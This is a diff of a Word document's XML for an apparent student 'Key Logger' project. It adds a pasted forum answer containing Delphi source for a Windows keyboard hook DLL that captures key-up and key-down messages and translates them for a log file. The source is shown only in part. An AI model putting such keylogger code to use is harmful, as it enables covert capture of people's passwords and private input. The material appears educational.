--- a/Konzept.docx
+++ b/Konzept.docx
@@ -10,11 +10,2577 @@
         <w:t>Infoprojekt  - Key Logger</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift1"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hook example to reverse engineer </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="KeinLeerraum"/>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Verified</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Answer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "http://www.experts-exchange.com/Programming/Languages/Pascal/Delphi/Q_21220329.html" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vanish/>
+          <w:color w:val="2781B7"/>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="KeinLeerraum"/>
+        <w:rPr>
+          <w:vanish/>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:vanish/>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The member who asked this question verified this comment provided the solution that solved their problem. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="KeinLeerraum"/>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:vanish/>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:pict/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId4" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:color w:val="2781B7"/>
+            <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+          </w:rPr>
+          <w:t>geobul</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Posted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on 2004-12-01 at 02:11:13</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:anchor="a12714198" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:color w:val="2781B7"/>
+            <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+          </w:rPr>
+          <w:t>ID: 12714198</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="KeinLeerraum"/>
+        <w:rPr>
+          <w:lang w:eastAsia="de-CH"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Hi,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">The hook </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>dll</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>--------</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">library </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHook</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>uses</w:t>
+      </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  Windows,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  Messages,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>SysUtils</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookHandle</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: HHOOK;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  FF: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TextFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: string;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">function </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TheHookProc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(Code : integer; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> : DWORD; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> : DWORD): </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>longint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>stdcall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: string;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>KeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>TKeyBoardState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>VirtualKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: byte;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>ScanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: byte;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>AChar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: array[0..1] of Char;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>: string;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  result := 0;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (Code = HC_ACTION) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>tagMSG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>)^).Message = WM_KEYUP) or (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>tagMSG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>)^).Message = WM_KEYDOWN) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // record UP/DOWN state</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>tagMSG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)^).Message = WM_KEYUP) then </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'KEYUP   '</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      else </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>LogText</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := 'KEYDOWN ';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // translate the key to ASCII</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>GetKeyboardState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>KeyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>VirtualKey</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>tagMSG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>)^).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>WParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>ScanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> := HIBYTE(LOWORD(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>tagMSG</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>)^).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
